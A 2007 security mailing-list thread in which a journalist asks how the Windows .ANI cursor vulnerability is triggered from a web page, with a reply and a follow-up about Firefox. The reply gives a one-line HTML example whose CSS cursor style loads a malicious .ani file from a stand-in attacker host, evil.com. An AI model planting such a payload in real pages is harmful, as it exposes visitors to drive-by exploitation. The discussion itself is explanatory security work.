Thanks. BTW, I had also read that Firefox would be affected by this bug, but their docs (http://developer.mozilla.org/en/docs/Using_URL_values_for_the_cursor_pr operty) specifically state that .ANI is not supported. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ <blocked::http://security.eweek.com/> http://blog.eweek.com/blogs/larry%5Fseltzer/ <http://blog.eweek.com/blogs/larry_seltzer/> <http://blog.ziffdavis.com/seltzer> Contributing Editor, PC Magazine [EMAIL PROTECTED]
________________________________ From: avivra [mailto:[EMAIL PROTECTED] Sent: Saturday, March 31, 2007 5:47 PM To: Larry Seltzer; [email protected] Subject: RE: [funsec] How do you load a .ANI from a web page? Hi Larry, A cursor css style. e.g. <div style="cursor:url(http://evil.com/mal.ani)"></div> More info can be found here: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml /reference/properties/cursor.asp --Aviv. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Larry Seltzer Sent: Sunday, April 01, 2007 12:15 AM To: [email protected] Subject: [funsec] How do you load a .ANI from a web page? I keep hearing that the .ANI vulnerability can be invoked just by viewing a web page. How do you load a .ANI file from a web page? Related question: I keep hearing that you can be exploited from plain text mail. How the hell is this possible, or is it just a matter of web links and file attachments? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ <blocked::http://security.eweek.com/> http://blog.eweek.com/blogs/larry%5Fseltzer/ <http://blog.eweek.com/blogs/larry_seltzer/> Contributing Editor, PC Magazine [EMAIL PROTECTED]
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
